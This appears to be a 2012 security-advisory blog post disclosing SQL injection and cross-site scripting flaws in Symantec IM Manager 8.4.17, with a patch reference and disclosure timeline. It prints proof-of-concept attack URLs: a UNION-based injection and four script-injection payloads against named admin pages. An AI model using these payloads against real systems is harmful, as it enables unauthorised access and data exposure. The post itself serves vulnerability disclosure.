facebook Password Reset Vulnerability Found in

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 28 April 2012

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 10:28 by freda
Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.

Proof of concept
SQL Injection
==========
http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--



Cross-Site Scripting (XSS)
====================
  • http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E



Solution
Symantec has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in SQL Injection, Symantec, XSS | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability
    Description Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publis...
  • Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.f...
  • Sybase EAServer 6.3.1 Directory Traversal Vulnerability
    Description Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run ...
  • FileCOPA FTP Server 5.02 Directory Traversal Vulnerability
    Description FileCOPA is a commercial FTP server for Windows that is available as shareware. Sow Ching Shiong, an independent vulnerability r...
  • Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsof...
  • Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, whi...
  • Trend Micro Control Manager 5.5 Directory Traversal Vulnerability
    Description Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administr...
  • F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability
    Description F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus out...
  • Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.m...
  • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities
    Description Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of f...

Categories

  • Adobe
  • Apache
  • Apple
  • Arbitrary File Upload
  • CSRF
  • Directory Traversal
  • F-Secure
  • Facebook
  • HP
  • Microsoft
  • Oracle
  • Password Reset
  • SQL Injection
  • Sybase
  • Symantec
  • Trend Micro
  • Twitter
  • XSS

Blog Archive

  • ►  2013 (1)
    • ►  January (1)
  • ▼  2012 (25)
    • ►  July (1)
    • ►  May (4)
    • ▼  April (20)
      • Twitter Bug #1: Cross-Site Scripting (XSS) Found i...
      • Apple Bug #1: Cross-Site Scripting (XSS) Found in ...
      • Oracle iPlanet Web Server 7.0.9 Multiple Cross-Sit...
      • Apache Camel 2.7.0 Multiple Cross-Site Scripting (...
      • HP System Management Homepage 6.2.2.7 Cross-Site R...
      • Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability
      • Symantec IM Manager 8.4.17 SQL Injection and Cross...
      • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnera...
      • Symantec Endpoint Protection Manager 11.0.6 Cross-...
      • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request...
      • Trend Micro Control Manager 5.5 Directory Traversa...
      • Trend Micro Control Manager 5.5 Cross-Site Scripti...
      • Adobe ColdFusion 9.0.1.274733 Cross-Site Request F...
      • Sybase EAServer 6.3.1 Directory Traversal Vulnerab...
      • F-Secure Policy Manager Web Reporting 9.00.30231 P...
      • HP Power Manager 4.3.2 Cross-Site Request Forgery ...
      • PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulner...
      • CompleteFTP Server 4.0.2 Directory Traversal Vulne...
      • SnugServer FTP Server 4.3.0.126 Directory Traversa...
      • FileCOPA FTP Server 5.02 Directory Traversal Vulne...
Powered by Blogger.

About Me

freda
View my complete profile